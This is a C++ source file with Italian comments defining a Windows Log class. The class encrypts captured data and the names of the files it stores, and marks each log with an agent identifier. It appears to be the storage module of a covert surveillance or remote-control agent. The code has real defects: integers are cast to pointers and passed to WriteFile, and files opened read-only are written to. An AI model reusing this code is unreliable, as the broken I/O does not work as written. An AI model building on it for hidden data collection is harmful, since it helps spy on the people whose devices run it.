#include <vector>
#include <string.h>

using namespace std;

#include "Log.h"

Log::Log() : wName(NULL), wEncName(NULL), encryptionObj(NULL), hFile(INVALID_HANDLE_VALUE){
	encryptionObj = new Encryption(g_AesKey, 128);
}

BOOL Log::WriteLog(UINT Id, UINT Type, UINT Seq, BYTE* pByte, UINT uLen, UINT uAdditional) {
	LogStruct LogDescription;
	SYSTEMTIME st;
	FILETIME ft;
	UINT t_seq = 0;
	UINT len = 8 + 1 + 8 + 1 + 4 + 4 + 1;	// 8 per l'id, 8 per il tipo, 4 per la sequenza, 
											// 4 per l'ext e 1 per il NULL, gli altri sono i trattini
	DWORD dwWritten;

	if(hFile != INVALID_HANDLE_VALUE){
		CloseLog();
	}

	if(wName){
		delete[] wName;
		wName = NULL;
	}

	t_seq = Seq;

	wName = new(std::nothrow) WCHAR[len];

	if(wName == NULL)
		return FALSE;
	
	memset(wName, 0x00, sizeof(WCHAR) * len);

	// Il file non dovrebbe esistere, ma nel caso effettuiamo un loop fino a trovare
	// un posticino per questo log.
	while(1){
		wsprintf(wName, L"%x-%x-%d.bin", Id, Type, t_seq);
		wEncName = encryptionObj->EncryptName(wName, g_AesKey[0]);

		hFile = CreateFile(wEncName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile == INVALID_HANDLE_VALUE){
			break;
		}

		CloseHandle(hFile); // Chiudo il file e libero wEncName
		t_seq++;
	}

	hFile = CreateFile(wEncName, GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	
	if(hFile == INVALID_HANDLE_VALUE){
		CloseLog();
		return FALSE;
	}

	GetSystemTime(&st);
	SystemTimeToFileTime(&st, &ft);

	// Riempiamo i membri della struttura
	LogDescription.cbSize = sizeof(LogStruct);
	LogDescription.uVersion = LOG_VERSION_01;
	LogDescription.uLogType = Id; // Id dell'agente
	LogDescription.uHTimestamp = ft.dwHighDateTime;
	LogDescription.uLTimestamp = ft.dwLowDateTime;
	LogDescription.FileNameLength = wcslen(wEncName) * sizeof(WCHAR);
	LogDescription.uAdditionalData = uAdditional;
	LogDescription.FileSize = 0; // Per sicurezza lo scriviamo solo dopo la cifratura

	// Scrivi l'header nel file
	if(WriteFile(hFile, (BYTE *)&LogDescription, sizeof(LogStruct), &dwWritten, NULL) == FALSE){
		CloseLog();
		return FALSE;
	}

	// Scriviamo il nome del file
	if(WriteFile(hFile, (BYTE *)wEncName, LogDescription.FileNameLength, &dwWritten, NULL) == FALSE){
		CloseLog();
		return FALSE;
	}

	// Scriviamo i dati addizionali, se presenti (li prendiamo dal buffer pByte)
	if(LogDescription.uAdditionalData){
		if(WriteFile(hFile, (BYTE *)pByte, LogDescription.uAdditionalData, &dwWritten, NULL) == FALSE){
			CloseLog();
			return FALSE;
		}

		pByte += LogDescription.uAdditionalData;
	}

	// Cifra i byte e scrivili
	UINT t_len = uLen;
	BYTE* encrypted = NULL;
	encrypted = encryptionObj->EncryptData(pByte, &t_len);

	if(encrypted == NULL){
		CloseLog();
		return FALSE;
	}

	// Scriviamo la dword che identifica la quantita' di byte nel file
	if(WriteFile(hFile, (BYTE *)t_len, sizeof(UINT), &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	// E poi i dati cifrati
	if(WriteFile(hFile, encrypted, t_len, &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	// Aggiorniamo quindi la dimensione del file nella struttura
	UINT offset = 0;

	if(LogDescription.uVersion == LOG_VERSION_01)
		offset = sizeof(UINT) * 5; // Skippiamo i primi 5 membri della struttura

	SetFilePointer(hFile, offset, 0, FILE_BEGIN);

	if(WriteFile(hFile, (BYTE *)offset, sizeof(UINT), &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	delete[] encrypted;
	CloseLog();
	return TRUE;
}

BOOL Log::AppendLog(UINT Id, UINT Type, UINT Seq, BYTE* pByte, UINT uLen) {
	UINT t_seq = 0;
	UINT len = 8 + 1 + 8 + 1 + 4 + 4 + 1;	// 8 per l'id, 8 per il tipo, 4 per la sequenza, 
	// 4 per l'ext e 1 per il NULL, gli altri sono i trattini
	DWORD dwWritten;

	if(hFile != INVALID_HANDLE_VALUE){
		CloseHandle(hFile);
		hFile = INVALID_HANDLE_VALUE;
	}

	t_seq = Seq;

	if(wName == NULL){
		wName = new(std::nothrow) WCHAR[len];

		if(wName == NULL)
			return FALSE;

		if(wEncName){
			free(wEncName);
			wEncName = NULL;
		}

		memset(wName, 0x00, sizeof(WCHAR) * len);
		wsprintf(wName, L"%x-%x-%d.bin", Id, Type, t_seq);
		wEncName = encryptionObj->EncryptName(wName, g_AesKey[0]);
	}


	hFile = CreateFile(wEncName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hFile == INVALID_HANDLE_VALUE){
		CloseLog();
		return FALSE;
	}

	// Spostati alla fine del file
	SetFilePointer(hFile, 0, 0, FILE_END);

	// Cifra i byte e scrivili
	UINT t_len = uLen;
	BYTE* encrypted = NULL;
	encrypted = encryptionObj->EncryptData(pByte, &t_len);

	if(encrypted == NULL){
		CloseLog();
		return FALSE;
	}

	// Scriviamo la dword che identifica la quantita' di byte nel file
	if(WriteFile(hFile, (BYTE *)t_len, sizeof(UINT), &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	// E poi i dati cifrati
	if(WriteFile(hFile, encrypted, t_len, &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	// Spostiamoci di nuovo all'inizio del file ed aggiorniamo la dimensione totale,
	// calcoliamo l'offset dal primo byte
	UINT offset = 0, version = 0;

	SetFilePointer(hFile, 4, 0, FILE_BEGIN);

	// Leggiamo la versione di log
	ReadFile(hFile, &version, sizeof(UINT), &dwWritten, NULL);

	switch(version){
		case LOG_VERSION_01:
			offset = sizeof(UINT) * 5; // Skippiamo i primi 5 membri della struttura
			break;
		default:
			offset = sizeof(UINT) * 5;
			break;
	}

	SetFilePointer(hFile, offset, 0, FILE_BEGIN);

	// Aggiorniamo la dimensione
	if(WriteFile(hFile, (BYTE *)GetFileSize(hFile, NULL), sizeof(UINT), &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	delete[] encrypted;
	CloseLog();
	return TRUE;
}

BOOL Log::CloseLog() {
	if(hFile != INVALID_HANDLE_VALUE){
		CloseHandle(hFile);
		hFile = INVALID_HANDLE_VALUE;
	}

	if(wName){
		delete[] wName;
		wName = NULL;
	}

	if(wEncName){
		free(wEncName);
		wEncName = NULL;
	}

	return TRUE;
}

BOOL Log::RemoveLog(WCHAR* wLogName) {
	return DeleteFile(wLogName);
}

vector<WCHAR*>* Log::ListLogs() {
	throw "Not yet implemented";
}

Log::~Log() {
	CloseLog();

	if(encryptionObj)
		delete encryptionObj;
}
